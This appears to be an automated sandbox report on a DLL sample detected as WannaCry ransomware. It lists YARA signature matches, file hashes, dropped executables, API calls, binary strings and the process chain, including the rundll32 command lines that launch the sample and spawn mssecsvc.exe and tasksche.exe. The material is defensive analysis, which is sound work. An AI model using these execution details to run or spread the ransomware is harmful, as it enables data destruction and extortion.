              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0000001F.00000000.342404801.000000000040E000.00000008.00000001.01000000.00000007.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000008.00000000.272553493.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000000.261795649.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000008.00000000.268327554.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000000.260345828.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000000.264801473.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000008.00000000.269636175.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED; Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: C:\Windows\tasksche.exe, type: DROPPED; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED; Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Windows\mssecsvc.exe, type: DROPPED; Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: C:\Windows\mssecsvc.exe, type: DROPPED; Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: C:\Windows\mssecsvc.exe, type: DROPPED; Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\mssecsvc.exe, type: DROPPED; Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Windows\SysWOW64\rundll32.exe; File created: C:\WINDOWS\mssecsvc.exe
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC3CF0
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC28C8
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC3CC2
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC3C3D
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC3D36
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC3D1F
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC3D4B
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA3CF0
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA28C8
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA3CC2
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA4C9E
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA3D4B
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA3C3D
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA3D36
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA3D1F
Source: C:\Windows\tasksche.exe; Code function: 31_2_00406C40
Source: C:\Windows\tasksche.exe; Code function: 31_2_00402A76
Source: C:\Windows\tasksche.exe; Code function: 31_2_00402E7E
Source: C:\Windows\tasksche.exe; Code function: 31_2_0040350F
Source: C:\Windows\tasksche.exe; Code function: 31_2_00404C19
Source: C:\Windows\tasksche.exe; Code function: 31_2_0040541F
Source: C:\Windows\tasksche.exe; Code function: 31_2_00403797
Source: C:\Windows\tasksche.exe; Code function: 31_2_004043B7
Source: C:\Windows\tasksche.exe; Code function: 31_2_004031BC
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC05F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC252F NtOpenSection
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC2574 NtMapViewOfSection,FindCloseChangeNotification,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC144A LookupPrivilegeValueA,NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC24AE lstrcpyW,lstrlenW,NtCreateSection
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_00AC3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA24AE lstrcpyW,lstrlenW,NtCreateSection
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA2574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA144A LookupPrivilegeValueA,NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA252F NtOpenSection
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken
Source: C:\Windows\mssecsvc.exe; Code function: 4_2_7FEA3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile
Source: mssecsvc.exe.2.dr; Static PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.8.dr; Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Source: C:\Windows\System32\svchost.exe; Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: cdpsgshims.dll
Source: Joe Sandbox View; Dropped File: C:\Windows\tasksche.exe F60F8A6BCAF1384A0D6A76D3E88007A8604560B263D2B8AEEE06FD74C9EE5B3B
Source: y2jb4FtSNq.dll; Virustotal: Detection: 84%
Source: y2jb4FtSNq.dll; Metadefender: Detection: 77%
Source: y2jb4FtSNq.dll; ReversingLabs: Detection: 92%
Source: y2jb4FtSNq.dll; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll"
Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGame
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",PlayGame
Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
Source: unknown; Process created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe -m security
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown; Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown; Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown; Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown; Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\mssecsvc.exe; Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: C:\Windows\mssecsvc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\System32\backgroundTaskHost.exe; File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\1658565894
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cpu.inf_locCC
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sys
              Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex,
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ndiscap.sysS,
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00d.catp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: ^\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows
              Source: mssecsvc.exe.2.drBinary string: v\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\WinSATAPI.dllp
              Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\History\desktop.ini:
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-LocalPrinting-Home-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\nslog.cfgS
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\lltdio.inf_loc
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\acpi.inf_loc
              Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\Temp\_avast_p
              Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\netsstpt.PNFwnp
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows Defender
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sys9
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\sdiagnhost.exe
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\WUDFRd.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume2\Windows\System32\config\systemprofile\Favorites\desktop.ini
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr009.cat1p
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\publog.cfgk
              Source: mssecsvc.exe.2.drBinary string: V\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chkH
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\udhisapi.dll
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\HdAudio.sys.muip
